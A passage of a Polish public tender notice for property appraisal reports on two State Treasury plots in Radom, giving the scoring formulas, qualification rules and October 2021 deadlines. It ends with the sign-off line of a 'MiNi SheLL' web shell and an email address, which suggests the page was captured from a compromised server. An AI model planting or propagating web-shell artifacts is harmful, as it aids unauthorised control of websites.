Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do<br/>dwóch miejsc po przecinku) w oparciu o następujące wzory: Ocena w zakresie kryterium „Cena” będzie<br/>dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba<br/>punktów możliwych do uzyskania – 60). C = (Cn / Cb) x 60 pkt, gdzie: C - ilość punktów za kryterium<br/>„Cena” Cn - najniższa cena ofertowa spośród ofert nieodrzuconych Cb - cena oferty badanej. Ocena w<br/>zakresie kryterium „Termin wykonania zamówienia” będzie dokonywana na podstawie podanego w<br/>formularzu ofertowym terminu wykonania zamówienia (liczba punktów możliwych do uzyskania – 40).<br/>Ocena przeprowadzona zostanie wg poniższego zestawienia:- oferta, w której wskazany przez<br/>Wykonawcę termin wykonania zamówienia wyniesie: 1 dzień otrzyma 40 pkt., 2 dni otrzyma 30 pkt. , 3 dni otrzyma 25 pkt., 4 dni otrzyma 20 pkt., 5 dni otrzyma 15 pkt., 6 dni otrzyma 10 pkt., 7 dni otrzyma 0 pkt., gdzie: T – ilość punktów za kryterium „Termin wykonania zamówienia”. Zamawiający wybierze<br/>ofertę, która otrzyma najwyższa liczbę punktów (P), stanowiących sumę punktów przyznanych w<br/>ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem: P - liczba punktów<br/>uzyskana przez ofertę: P = C + T</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa sporządzenia opinii o wartości nieruchomości w formie operatu szacunkowego (2 egz.) dotyczącego określenia wartości rynkowej prawa własności nieruchomości gruntowej w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego z uwzględnieniem nakładów na urządzenia infrastruktury technicznej oraz nakładów koniecznych, o których mowa w art. 143 ust. 2 wybudowanych z udziałem środków, o których mowa w art. 143 ust. 1 w ustawie z dnia 21.08.1997r. <br/>o gospodarce nieruchomościami (j.t. Dz. U. z 2020r., poz. 1990 z późn. zm.), stanowiącej własność Skarbu Państwa, położonej w Radomiu przy ulicy Staroopatowskiej, oznaczonej w ewidencji gruntów i budynków <br/>m. Radomia nr 234/3 o pow. 3416m2, (Obr. 00120, ark. 123), zapisanej w księdze wieczystej <br/>Nr RA1R/00087942/2, we współużytkowaniu wieczystym osób fizycznych. <br/>W przypadku gdy nastąpiła budowa w/w urządzeń infrastruktury technicznej lub innych nakładów koniecznych, wówczas rzeczoznawca majątkowy winien wymagać od użytkownika wieczystego przedłożenia stosownej dokumentacji potwierdzającej powyższe w celu analizy powyższego i konsultacji z Wydziałem Nieruchomości Skarbu Państwa Urzędu Miejskiego w Radomiu. Jeśli takich nakładów nie dokonano, rzeczoznawca majątkowy winien w operacie szacunkowym powyższe opisać.<br/>Budynki posadowione na w/w gruncie nie są przedmiotem wyceny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska<br/>najwyższą ocenę punktową. Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do<br/>dwóch miejsc po przecinku) w oparciu o następujące wzory: Ocena w zakresie kryterium „Cena” będzie<br/>dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba<br/>punktów możliwych do uzyskania – 60). C = (Cn / Cb) x 60 pkt, gdzie: C - ilość punktów za kryterium<br/>„Cena” Cn - najniższa cena ofertowa spośród ofert nieodrzuconych Cb - cena oferty badanej. Ocena w<br/>zakresie kryterium „Termin wykonania zamówienia” będzie dokonywana na podstawie podanego w<br/>formularzu ofertowym terminu wykonania zamówienia (liczba punktów możliwych do uzyskania – 40).<br/>Ocena przeprowadzona zostanie wg poniższego zestawienia:- oferta, w której wskazany przez<br/>Wykonawcę termin wykonania zamówienia wyniesie: 7dni i mniej otrzyma 40 pkt., 8 dni otrzyma 35 pkt. , 9 dni otrzyma 30 pkt., 10 dni otrzyma 25 pkt., 11 dni otrzyma 20 pkt., 12 dni otrzyma 15 pkt., 13 dni otrzyma 10 pkt., 14 dni otrzyma 0 pkt. , gdzie: T – ilość punktów za kryterium „Termin wykonania zamówienia”. Zamawiający wybierze<br/>ofertę, która otrzyma najwyższa liczbę punktów (P), stanowiących sumę punktów przyznanych w<br/>ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem: P - liczba punktów<br/>uzyskana przez ofertę: P = C + T</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa sporządzenia opinii o wartości nieruchomości <br/>w formie operatu szacunkowego (2 egz.) dotyczącego określenia wartości rynkowej prawa własności nieruchomości gruntowej w związku z aktualizacją opłaty rocznej z tytułu użytkowania wieczystego <br/>z uwzględnieniem nakładów na urządzenia infrastruktury technicznej oraz nakładów koniecznych, o których mowa w art. 143 ust. 2 wybudowanych z udziałem środków, o których mowa w art. 143 ust. 1 w ustawie <br/>z dnia 21.08.1997r. o gospodarce nieruchomościami (j.t. Dz. U. z 2020r., poz. 1990 z późn. zm.), stanowiącej własność Skarbu Państwa, położonej w Radomiu przy ulicy Przytyckiej, oznaczonej w ewidencji gruntów i budynków m. Radomia nr 231/38 o pow. 5788 m2, ( Obr. 0010, ark. 20), zapisanej w księdze wieczystej Nr RA1R/00104235/9, będącej w użytkowaniu wieczystym osoby prawnej.<br/>W przypadku gdy nastąpiła budowa w/w urządzeń infrastruktury technicznej lub innych nakładów koniecznych, wówczas rzeczoznawca majątkowy winien wymagać <br/>od użytkownika wieczystego przedłożenia stosownej dokumentacji potwierdzającej powyższe w celu analizy powyższego i konsultacji z Wydziałem Nieruchomości Skarbu Państwa Urzędu Miejskiego w Radomiu. Jeśli takich nakładów nie dokonano, rzeczoznawca majątkowy winien w operacie szacunkowym powyższe opisać.<br/>Budynki posadowione na w/w gruncie nie są przedmiotem wyceny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71319000-7 - Usługi biegłych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">14 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą uznana zostanie ta z ocenianych ofert, która uzyska<br/>najwyższą ocenę punktową. Zamawiający będzie obliczał wartość punktową oferty (zaokrągloną do<br/>dwóch miejsc po przecinku) w oparciu o następujące wzory: Ocena w zakresie kryterium „Cena” będzie<br/>dokonywana na podstawie ilości punktów otrzymanych przy zastosowaniu następującego wzoru (liczba<br/>punktów możliwych do uzyskania – 60). C = (Cn / Cb) x 60 pkt, gdzie: C - ilość punktów za kryterium<br/>„Cena” Cn - najniższa cena ofertowa spośród ofert nieodrzuconych Cb - cena oferty badanej. Ocena w<br/>zakresie kryterium „Termin wykonania zamówienia” będzie dokonywana na podstawie podanego w<br/>formularzu ofertowym terminu wykonania zamówienia (liczba punktów możliwych do uzyskania – 40).<br/>Ocena przeprowadzona zostanie wg poniższego zestawienia:- oferta, w której wskazany przez<br/>Wykonawcę termin wykonania zamówienia wyniesie: 7dni i mniej otrzyma 40 pkt., 8 dni otrzyma 35 pkt. , 9 dni otrzyma 30 pkt., 10 dni otrzyma 25 pkt., 11 dni otrzyma 20 pkt., 12 dni otrzyma 15 pkt., 13 dni otrzyma 10 pkt., 14 dni otrzyma 0 pkt. , gdzie: T – ilość punktów za kryterium „Termin wykonania zamówienia”. Zamawiający wybierze<br/>ofertę, która otrzyma najwyższa liczbę punktów (P), stanowiących sumę punktów przyznanych w<br/>ramach każdego z podanych kryteriów, wyliczoną zgodnie z poniższym wzorem: P - liczba punktów<br/>uzyskana przez ofertę: P = C + T</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60,00</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40,00</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu dotyczące zdolności technicznej lub zawodowej, tj.: Wykonawca spełni warunek,<br/>jeżeli udowodni, że osoby skierowane przez wykonawcę do realizacji zamówienia posiadają<br/>niezbędne kwalifikacje zawodowe umożliwiające realizację zamówienia na odpowiednim<br/>poziomie jakości. Powyższy warunek zostanie spełniony, jeżeli Wykonawca wykaże, że<br/>dysponuje minimum jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia,<br/>posiadającą uprawnienia w zakresie określonym w art. 193 ustawy z dnia 21 sierpnia 1997 r. o<br/>gospodarce nieruchomościami (t. j. Dz. U. z 2020 r. poz. 1990 z późn. zm.). W przypadku<br/>złożenia oferty na więcej niż jedną część zamówienia Zamawiający dopuszcza możliwość<br/>posłużenia się tą samą osobą. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1) Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego w pkt 1 Rozdział VIII SWZ – Załącznik nr 6 do SWZ. 2) Odpis lub informacja z<br/>Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie art. 109 ust. 1 pkt 4 ustawy Pzp, sporządzone nie wcześniej niż 3 miesiące przed jej<br/>złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia<br/>publicznego, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat<br/>ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także<br/>zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi<br/>osobami - Załącznik nr 7 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga w niniejszym postępowaniu przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1) Potwierdzenie umocowania do działania w imieniu Wykonawcy lub podmiotu<br/>udostępniającego zasoby, tj. odpis lub informacja z Krajowego Rejestru Sądowego, Centralnej<br/>Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru (składane<br/>wraz z ofertą w przypadku osoby działającej w imieniu Wykonawcy). 2) Pełnomocnictwo lub inny<br/>dokument potwierdzający umocowanie do reprezentowania Wykonawcy lub podmiotu<br/>udostępniającego zasoby - jeżeli umocowanie do reprezentowania nie wynika bezpośrednio z<br/>załączonych dokumentów. 3) Pełnomocnictwo do reprezentowania Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego<br/>(jeżeli dotyczy).4) Oświadczenie, o którym mowa w pkt 4 Rozdział XII SWZ (jeżeli dotyczy). W<br/>odniesieniu do warunków dotyczących kwalifikacji zawodowych wykonawcy wspólnie ubiegający<br/>się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy<br/>wykonają usługi, do realizacji których te zdolności są wymagane. W takim przypadku<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które usługi wykonają poszczególni wykonawcy. Oświadczenie należy złożyć<br/>wg wymogów Załącznika nr 5 do SWZ. Oświadczenie to jest podmiotowym środkiem<br/>dowodowym. 5) Zobowiązanie lub inne dokumenty, o których mowa w pkt 4 Rozdział XI SWZ<br/>(jeżeli dotyczy). Wykonawca może w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu, w stosownych sytuacjach oraz w odniesieniu do przedmiotowego zamówienia,<br/>lub jego części, polegać na zdolnościach technicznych lub zawodowych innych podmiotów,<br/>niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. Zamawiający<br/>jednocześnie informuje, iż Wykonawca, który polega na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, składa wraz z ofertą zobowiązanie podmiotu udostępniającego<br/>zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego<br/>zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując<br/>zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów. Zobowiązanie musi<br/>wskazywać w szczególności: a) zakres dostępnych wykonawcy zasobów podmiotu<br/>udostępniającego zasoby;<br/>b) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu<br/>udostępniającego te zasoby przy wykonywaniu zamówienia;<br/>c) czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego wykonawca<br/>polega w odniesieniu do warunków udziału w postępowaniu dotyczących kwalifikacji<br/>zawodowych, zrealizuje usługi, których wskazane zdolności dotyczą.<br/>Pisemne zobowiązanie, o którym mowa powyżej musi być złożone - na druku stanowiącym<br/>Załącznik nr 4 do SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku,<br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia<br/>publicznego. 2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>oświadczenie, o którym mowa w pkt 1 Rozdział IX SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenie to potwierdza brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu. 3. W odniesieniu do<br/>warunków dotyczących kwalifikacji zawodowych wykonawcy wspólnie ubiegający się o<br/>udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają<br/>usługi, do realizacji których te zdolności są wymagane. 4. W przypadku, o którym mowa w pkt 3,<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie,<br/>z którego wynika, które usługi wykonają poszczególni wykonawcy. Oświadczenie należy złożyć<br/>wg wymogów Załącznika nr 5 do SWZ. Oświadczenie to jest podmiotowym środkiem<br/>dowodowym. 5. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia obowiązani są na<br/>wezwanie Zamawiającego, złożyć podmiotowe środki dowodowe, o których mowa w pkt 4<br/>Rozdział IX SWZ, przy czym podmiotowe środki dowodowe, o których mowa: a) w pkt 4.2.<br/>Rozdział IX SWZ składa odpowiednio Wykonawca/Wykonawcy, który/którzy wykazuje/-ą<br/>spełnienie warunku b) w pkt 4.1. Rozdział IX SWZ składa każdy z Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia. Szczegółowe informacje na temat form, postaci,<br/>formatów i sposobu przekazywania ww. dokumentów zostały opisane w Rozdziale IX SWZ. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-08 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/transakcja/501254</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-08 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com